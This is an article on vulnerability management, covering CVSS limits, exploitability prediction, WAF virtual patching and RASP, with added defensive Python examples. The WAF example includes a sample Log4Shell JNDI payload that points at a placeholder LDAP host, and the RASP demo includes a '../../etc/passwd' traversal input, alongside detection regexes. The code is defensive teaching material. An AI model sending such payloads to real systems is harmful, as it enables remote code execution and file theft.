Software vulnerabilities are an ever-growing threat. Each CVE publication seems to add yet another ticking time bomb, and the load on security professionals is growing faster than the backlog of patches awaiting deployment. The core weakness of the patching process is not a lack of severity scores but a lack of context: a score on its own says nothing about the on-the-ground effect of a given flaw in your environment. Here is how a web application firewall and a reprioritized patch queue can revitalize your organization's approach to vulnerability management.
The Growing Threat of Production Vulnerabilities
2021 saw the highest number of software vulnerabilities on record, almost 10% more than 2020's total of 18,351. In 2021, over 25,000 different software products shipped with vulnerabilities, potentially undermining the defenses of millions of customers and organizations. The good news is that the number of high-severity vulnerabilities actually fell, from 4,378 to 4,063. This is the first such decrease in five years, and development and operations teams must work hard to continue the trend into 2022.
One trend that 2021 continued to define is attack complexity. Low-complexity vulnerabilities (in CVSS terms, those exploitable without special conditions beyond the attacker's control) rose again, making up 94% of all vulnerabilities disclosed in 2021, up from 88% in 2020. Such flaws have easily repeatable attack chains; regularly exploited by bots and script kiddies, they give criminals an easy way to gain a foothold in your organization's defenses. High-complexity attacks, by contrast, depend on circumstances outside the attacker's control, such as winning a race condition. With low-effort attacks dominating, cyber criminals are reaping the rewards of doing ever less work.
The vast majority of 2021's vulnerabilities could be exploited without any help from inside the target. Still, about a third of the vulnerabilities in the study did require user interaction: an unwitting insider opening a file or following a link to hand the attacker control. This range of attack vectors shows the weakness of relying on headline figures alone. Patching and maintaining every piece of vulnerable software is an immense drain on resources, so cybersecurity strategy needs to keep up with the hypergrowth in modern vulnerability counts.
How Your Patching Benefits From Reprioritization
Vulnerable software is only a threat while it remains unpatched. The logical action to shore up an organization's defenses, therefore, is simply to apply the patches. However, keeping up with vulnerability patching is intensely challenging. Cybersecurity teams remain understaffed and overworked, making the mantra of "always keep all software up to date" hopelessly optimistic for departments that simply lack the resources. The sheer quantity of patches is compounded by the lack of real insight into the practical consequences of each weakness. In search of some method in the madness, admins have turned to the severity ratings of the Common Vulnerability Scoring System (CVSS).
However, this approach can actually exacerbate the underlying problem. Ordering patches by CVSS score alone leaves the queue with no context. CVSS may seem promising, and knowing about a high-severity remote code execution flaw is vital, but the score says nothing about whether that flaw is actually likely to be used by an attacker. It does not indicate whether the flaw is present on 15 systems or 15 million, or whether publicly accessible servers are affected. Attackers increasingly rely on low-effort attacks because of the better return on investment they offer, so the resource-intensive patching processes organizations employ are not even aligned with the attacks facing them. Already-limited resources end up spent on bugs that are unlikely ever to be exploited.
The weakness presented by an indiscriminate and mismanaged patch process demands solutions. Recently, a team of university researchers developed a model named Expected Exploitability. Trained on data from over two dozen sources, this prediction tool addresses not only the severity of each flaw but also how likely each vulnerability is to be exploited in the wild. Expected Exploitability identified 60% of the vulnerabilities for which a functional exploit was developed, at a precision of 86%. Particularly important to the model's accuracy is the flexibility of its input data: recognizing that not all relevant information is available when a vulnerability is first disclosed, the researchers took an adaptive approach, refining the prediction as further information such as proof-of-concept code is released.
Even cutting-edge predictive models, however, cannot solve every problem with patching. Faulty patches are increasingly common, as the Log4Shell response showed: Apache needed several successive releases before Log4j was fully fixed. The stakes of getting it wrong are illustrated by Equifax, whose breach through an unpatched Apache Struts flaw cost it over $700 million. Faulty patches mean not only that vulnerabilities persist, but also that security teams are thrown off the scent, so organizations miscalculate their own risk.
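To make the reprioritization argument concrete, the following Python sketch ranks the same set of findings two ways: by CVSS base score alone, and by a risk score that also takes an exploitability estimate (the kind of figure a model such as Expected Exploitability produces) and exposure (host count, internet reachability) into account. This is an added example, not code from the article or from the Expected Exploitability researchers; the weighting, the four findings and their labels are constructed for illustration, and the numbers are not real CVE data.

```python
"""Context-aware patch prioritization: CVSS order versus risk order."""
import math
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    label: str             # constructed identifier, not a real CVE
    cvss: float            # CVSS base score, 0.0 to 10.0
    exploit_prob: float    # estimated probability of real-world exploitation, 0 to 1
    hosts: int             # affected systems in our inventory
    internet_facing: bool  # reachable from the public internet


def risk_score(f):
    """Severity x likelihood x exposure (the weighting is an assumption of this example).

    Host count enters logarithmically so that 15 million hosts do not swamp
    every other factor; internet exposure doubles the result.
    """
    exposure = 1.0 + math.log10(max(f.hosts, 1))
    if f.internet_facing:
        exposure *= 2.0
    return f.cvss * f.exploit_prob * exposure


def rank_by_cvss(findings):
    """The naive queue: highest base score first."""
    return [f.label for f in sorted(findings, key=lambda f: f.cvss, reverse=True)]


def rank_by_risk(findings):
    """The contextual queue: highest risk_score first."""
    return [f.label for f in sorted(findings, key=risk_score, reverse=True)]


# Constructed inventory for the demonstration (not real vulnerabilities).
INVENTORY = [
    Finding("A-critical-rce-internal-tool", 9.8, 0.05, 3, False),
    Finding("B-high-auth-bypass-public-portal", 7.5, 0.90, 400, True),
    Finding("C-high-priv-esc-fleet-agent", 8.8, 0.30, 5000, False),
    Finding("D-medium-ssrf-public-api", 5.3, 0.95, 12, True),
]

if __name__ == "__main__":
    print("by CVSS:", rank_by_cvss(INVENTORY))
    print("by risk:", rank_by_risk(INVENTORY))
```

With this inventory the CVSS queue starts with the 9.8 remote code execution on three internal hosts that nobody is exploiting, while the risk queue pushes it to the bottom and leads with the internet-facing authentication bypass that is actively used. The exact weights matter less than the principle: likelihood and exposure must enter the ordering, not severity alone.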
Managing Vulnerability Risk
Virtual patching describes the rapid deployment of a short-term security policy that protects an application before its official patch is released, or before that patch can safely be rolled out. Virtual patching is particularly important for mission-critical systems that need to remain online. In these situations, certain tools can protect a piece of software without any change to its underlying source code. One of these tools is a web application firewall (WAF).
A WAF sits in front of an application, typically as a reverse proxy, analyzing the HTTP/S transactions between the application and the public-facing internet. It protects web apps by monitoring, filtering and blocking the requests traveling to the application and, where configured, the responses leaving it, so that an attack payload never reaches the vulnerable code and sensitive data is kept from leaking out. This is achieved through policies (rules) that define which traffic is treated as malicious and what to do with it. The WAF is a good first step toward a strong virtual-patch layer: new policies can be written and deployed in minutes, which makes it highly adaptable. Rate limiting, for example, can be implemented on a WAF to blunt application-layer denial-of-service attacks, though volumetric DDoS still needs upstream capacity that a WAF cannot provide.
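The following Python sketch shows the two kinds of policy described above as a WAF would apply them: a virtual patch for the Log4j JNDI lookup injection (Log4Shell), matched against every attacker-controlled part of a request, and a sliding-window rate limit per client. This is an added example, not code from the article or from any WAF vendor's ruleset; the rule identifiers, thresholds, client addresses and sample requests are constructed, and the code assumes the request has already been URL-decoded, as a real WAF does before matching.

```python
"""Minimal virtual-patch engine: signature rules plus per-client rate limiting."""
import re
import time
from collections import defaultdict, deque

# Virtual-patch rules (constructed; rule ids are illustrative, not a vendor's).
# Rule 1 matches the literal Log4Shell lookup prefix "${jndi:".
# Rule 2 matches a nested lookup such as "${${lower:j}ndi:...}", the usual way
# attackers evaded rule 1; legitimate requests almost never contain "${...${".
VIRTUAL_PATCHES = [
    ("vp-log4shell-jndi", re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)),
    ("vp-log4shell-nested", re.compile(r"\$\{[^}]*\$\{")),
]


def inspect_request(path, headers, body=""):
    """Apply the virtual-patch rules to every attacker-controlled surface.

    Returns ("block", rule_id) on the first match, otherwise ("allow", None).
    Headers are inspected too: Log4Shell payloads typically arrived in
    User-Agent or X-Forwarded-For rather than in the URL.
    """
    surfaces = [path, body, *headers.values()]
    for rule_id, pattern in VIRTUAL_PATCHES:
        if any(pattern.search(s) for s in surfaces):
            return ("block", rule_id)
    return ("allow", None)


class SlidingWindowLimiter:
    """Per-client limit: at most `limit` requests in any `window` seconds."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self._hits = defaultdict(deque)  # client -> timestamps of recent requests

    def allow(self, client, now=None):
        now = time.monotonic() if now is None else now
        hits = self._hits[client]
        while hits and now - hits[0] >= self.window:
            hits.popleft()  # forget requests that fell out of the window
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True


def waf_decision(limiter, client, path, headers, body="", now=None):
    """Cheap rate-limit check first, then the signature rules."""
    if not limiter.allow(client, now):
        return ("block", "rate-limit")
    return inspect_request(path, headers, body)


if __name__ == "__main__":
    limiter = SlidingWindowLimiter(limit=100, window=60)
    hostile = {"User-Agent": "${jndi:ldap://203.0.113.5/a}"}  # constructed payload
    print(waf_decision(limiter, "198.51.100.7", "/login", hostile))
```

Two caveats a practitioner should keep in mind. Signature rules like these are a stopgap: they buy time while the real patch is tested, and attackers will probe for encodings the rule does not cover, so the rule should be broadened as bypasses appear and retired once the code is fixed. And the rate limiter protects the application tier only; it does nothing against traffic that saturates the link before it reaches the WAF.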
Whereas a WAF sits in front of an application, Runtime Application Self-Protection (RASP) runs inside it, instrumenting the application's own dangerous operations and watching their behavior whenever the app is in use. When a security event occurs within the app, RASP intervenes at the point of the call. In diagnostic (monitor) mode, RASP only records and reports that something is amiss, letting the operation proceed. In protection mode, RASP actively blocks the actions it identifies as anomalous or unexpected.
Patching doesn't need to be a nightmare. Alongside a strong and adaptive protection layer, virtual patches can keep critical pieces of infrastructure out of reach of cybercriminals while sparing you the drawn-out wait for an official patch. They remain a bridge, not a destination: once the vendor fix is available and tested, apply it and retire the virtual patch.
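To show what the two RASP modes mean in practice, the following Python sketch hooks two in-process sinks, a command runner and a file reader, with detectors for shell metacharacters and for paths escaping their base directory; in diagnostic mode a detection is only recorded, in protection mode the call is refused. This is an added example, not code from the article or from any RASP product: the `Rasp` class, the detectors, the stand-in sinks and the sample calls are all constructed, and the sinks return strings instead of really executing commands or opening files so the example runs safely.

```python
"""Runtime hooks at dangerous sinks with diagnostic and protection modes."""
import functools
import posixpath
import re


class Blocked(RuntimeError):
    """Raised in protection mode when a hooked call is judged malicious."""


class Rasp:
    """Wraps application sinks; mode decides whether a detection blocks or only logs."""

    def __init__(self, mode="diagnostic"):
        if mode not in ("diagnostic", "protection"):
            raise ValueError(f"unknown mode {mode!r}")
        self.mode = mode
        self.events = []  # (sink name, reason) for every detection, in both modes

    def hook(self, detector):
        """Decorator: run `detector(*args, **kwargs)` before the sink.

        The detector returns a reason string for a malicious call, else None.
        """
        def decorate(sink):
            @functools.wraps(sink)
            def wrapper(*args, **kwargs):
                reason = detector(*args, **kwargs)
                if reason:
                    self.events.append((sink.__name__, reason))
                    if self.mode == "protection":
                        raise Blocked(f"{sink.__name__}: {reason}")
                return sink(*args, **kwargs)
            return wrapper
        return decorate


SHELL_META = re.compile(r"[;&|`$<>]")


def shell_injection(cmd):
    """Flag command strings carrying shell metacharacters (constructed heuristic)."""
    return "shell metacharacters in command" if SHELL_META.search(cmd) else None


def path_escape(base, name):
    """Flag a user-supplied name that resolves outside `base` (POSIX paths assumed)."""
    target = posixpath.normpath(posixpath.join(base, name))
    if posixpath.commonpath([base, target]) != base:
        return f"path escapes {base}"
    return None


def build_app(rasp):
    """Return the two hooked sinks of a toy application (stand-ins, no real I/O)."""

    @rasp.hook(shell_injection)
    def run_report(cmd):
        return f"would execute: {cmd}"  # stand-in for subprocess / os.system

    @rasp.hook(path_escape)
    def read_user_file(base, name):
        return posixpath.normpath(posixpath.join(base, name))  # stand-in for open()

    return run_report, read_user_file


if __name__ == "__main__":
    rasp = Rasp("diagnostic")
    run_report, read_user_file = build_app(rasp)
    read_user_file("/srv/uploads", "../../etc/passwd")  # proceeds, but is recorded
    print(rasp.events)
```

Run an agent in diagnostic mode first to learn what the application legitimately does, then switch to protection mode once the detectors stop firing on normal traffic; a detector that blocks benign calls turns a security control into an outage.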